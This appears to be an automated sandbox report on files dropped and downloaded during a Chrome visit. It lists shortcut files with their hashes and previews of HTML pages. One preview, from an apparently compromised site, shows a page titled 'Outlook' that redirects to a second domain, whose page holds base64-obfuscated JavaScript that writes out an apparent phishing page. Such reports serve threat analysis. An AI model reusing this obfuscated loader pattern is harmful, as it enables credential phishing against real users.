                              Preview:L..................F.@.. ...$+.,....h.)-...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2689
                              Entropy (8bit):4.005259647318075
                              Encrypted:false
                              SSDEEP:
                              MD5:52B6FE2CB64544341607CBB155C8A09A
                              SHA1:B73725B60445D44FE75B369DF7C70260832BC3A5
                              SHA-256:D5EF9F0E872686C5B2ECE5AC2143CC9BB62454E0EED041225DC17C405956CF23
                              SHA-512:F3F6233FD5DDD056C4464315D25F03742E79157A528C7987C8248A0AB4C79F397FF8D13D81937896E69DE52B3DA947064FAEE5026A0E1E2DFF7825D7308F4F1B
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 12:40:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.991871219502033
                              Encrypted:false
                              SSDEEP:
                              MD5:B81AABF09D27DCE6DE2D9F4F99416E22
                              SHA1:FF623A8B12FD8E40920ED53621610FA55A93C372
                              SHA-256:B7AFA6166761D8AED76F6268E67B360E500595721AA78DEB5DF89EA68A73FD36
                              SHA-512:2158639A10B0A64220BE7B5CC066E4E28DD3EF6705A111F5FCB2E2E8BD053499F914B6F31FD5F6CE3BF9252ABAD05D772D08865E94129E3369B95FC6B6DE3666
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,......"-...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 12:40:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.9778731552923685
                              Encrypted:false
                              SSDEEP:
                              MD5:E556DD39952E06B86334AB98C34A8E59
                              SHA1:D97F240DF40870D3031CB68E007513EA1000DD38
                              SHA-256:7159C9101B96D84D50A2C9D19CC9010244FA974BD013D84A2A7733A4CFF7295C
                              SHA-512:5083B8F03CC59B929C2BE39F162EE1592783D547727BCFF0CA2BDBF90C24C636107D9BDE99AA8933C7626B37FA42080D725DF18B2AFB6CEC75BE06ACE365A84C
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....7.0-...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 12:40:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):3.988969279197799
                              Encrypted:false
                              SSDEEP:
                              MD5:DA9E3B357459DCBC1C6E70FE58285EC8
                              SHA1:0968CD2CCC5BEA46A5063091D63EC5A0A2BC0A74
                              SHA-256:C5827422115554BD11186453E6A8D7BE388566125EF647393EB6EBCBE72CB9DF
                              SHA-512:06422A7033732537580F047D1147B33EE697DDAA78B5E56B0EEB586560950EDF0C6C59C943DD0EF64A502E52670F2699C2A4305A5E1470517E0CC9A8E72ACDA3
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.......-...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):2018
                              Entropy (8bit):4.860859736035365
                              Encrypted:false
                              SSDEEP:
                              MD5:EA3C18724E1F91A631FF4D5A69B6B7ED
                              SHA1:E4858A307964F7C04DE7E06711B77B18FD95D97E
                              SHA-256:53C4204A738B2AC59E31DEF8680FEAC5FE77986C777105D7642BEF1F967853E6
                              SHA-512:9D8AA05437F6F75D17266DB5F5FDDC10F113C04FD487CE99E0E6B5965B5F78DE80233B5FD7C85A52A3EEF34B816FB85FF35560BDD3817F64F4BDC07AF4A8A78A
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.sunniacademy.com/tag/quran-padhna-sikhe/
                              Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Outlook</title>. <script>. . function generateRandomString(length) {. const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';. let result = '';.. for (let i = 0; i < length; i++) {. result += characters.charAt(Math.floor(Math.random() * characters.length));. }.. return result;.}. . const randomString = generateRandomString(30);. . const urls = [. `https://g8c4.aldemeres.com/zBuFL/`,. ];.. async function checkFlaggedUrl(url) {. try {. const response = await fetch(url);.. // Check if the response contains a flagged page condition (e.g., a specific error message). // Replace the condition with the specific error message or status code for flagged URLs. const content = await response.text();.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (65364)
                              Category:downloaded
                              Size (bytes):565339
                              Entropy (8bit):3.7504675540701746
                              Encrypted:false
                              SSDEEP:
                              MD5:D36E1B6BD183F6847A92C88C4E33D29A
                              SHA1:416C899C344EF96A379A6350BA5B108E83E8E84E
                              SHA-256:710C0F38E629087A64A5E90FB0CC6BD2283EF9877D36A5663B3170578D1C93AC
                              SHA-512:6FCFB08C944E39184C8EA3611A750B8C7AB0CFEB6EA6AF62242BDC16D82AC8ADC7F3C85CEC85E42E2027AABD60467238D07CBC8443AFCD2C1532CFAED4F8DF64
                              Malicious:false
                              Reputation:unknown
                              URL:https://g8c4.aldemeres.com/zBuFL/
                              Preview:<script>.PLZlAFilyk = atob("aHR0cHM6Ly9nOGM0LmFsZGVtZXJlcy5jb20vekJ1Rkwv");.ePXPfyWvcj = atob("bm9tYXRjaA==");.DcXrsxPVDX = atob("d3JpdGU=");.if(PLZlAFilyk == ePXPfyWvcj){.document[DcXrsxPVDX](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPjxoZWFkPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPHN0eWxlPgogICAgICAgIGJvZHksIGh0bWwgewogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOwogICAgICAgIH0KCiAgICAgICAgKnstd2Via2l0LXRhcC1oaWdobGlnaHQtY29sb3I6dHJhbnNwYXJlbnQ7LXdlYmtpdC1mb250LXNtb290aGluZzphbnRpYWxpYXNlZH1ib2R5LGh0bWx7bWFyZ2luOjA7cGFkZGluZzowO2ZvbnQtZmFtaWx5Oi1hcHBsZS1zeXN0ZW0sc3lzdGVtLXVpLEJsaW5rTWFjU3lzdGVtRm9udCwiU2Vnb2UgVUkiLFJvYm90byxPeHlnZW4sVWJ1bnR1LCJIZWx2ZXRpY2EgTmV1ZSIsQXJpYWwsc2Fucy1zZXJpZjtvdmVyZmxvdzpoaWRkZW47aGVpZ2h0OjEwMCU7d2lkdGg6MTAwJTtiYWNrZ3JvdW5kLWNvbG9yOnJnYmEoMjU1LDI1NSwyNTUsMCk7YmFja2dyb3VuZC1jb2xvcjp
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (345), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):1898
                              Entropy (8bit):4.979289551603433
                              Encrypted:false
                              SSDEEP:
                              MD5:7CBBE0E42A7DD7B9267AFD37CECB592D
                              SHA1:611EE33CBD92C3D2FE30143967CAF5F31413A6C4
                              SHA-256:251A621EAC0426EDF850C4FD1933E52047137ED8C1FC59982E6F1ADD58BBCF14
                              SHA-512:C4BEC8F0669F1705E82332F624D653BDD234C0D782C725E2EF42A291CE90A9547F2E42B96CA6C963A13DBDAFF30AF97A63C153F912197EF8D9ACB6E20D626379
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1
                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8">.. <meta name="referrer" content="origin-when-cross-origin">.. <script>//<![CDATA[.. var s = false;.. function l() {.. setTimeout(f, 10000);.. if (document.referrer) {.. try {.. var pm = /(^|&|\?)px=([^&]*)(&|$)/i;.. var px = window.location.href.match(pm);.. var rs = document.referrer;.. if (px != null) {.. if (rs.match(pm)).. rs = rs.replace(pm, "$1px=" + px[2] + "$3");.. else if (rs.indexOf("?") != -1).. rs = rs + "&px=" + px[2];.. else.. rs = rs + "?px=" + px[2];.. }.. history.replaceState({}, "Bing", rs);.. window.addEventListener("pageshow", function(e) { if (e.persisted || (typeof window.performance != "undefined" && window.performance.navigation.type === 2)) window.location.reload(); });.. s = true;..
                              No static file info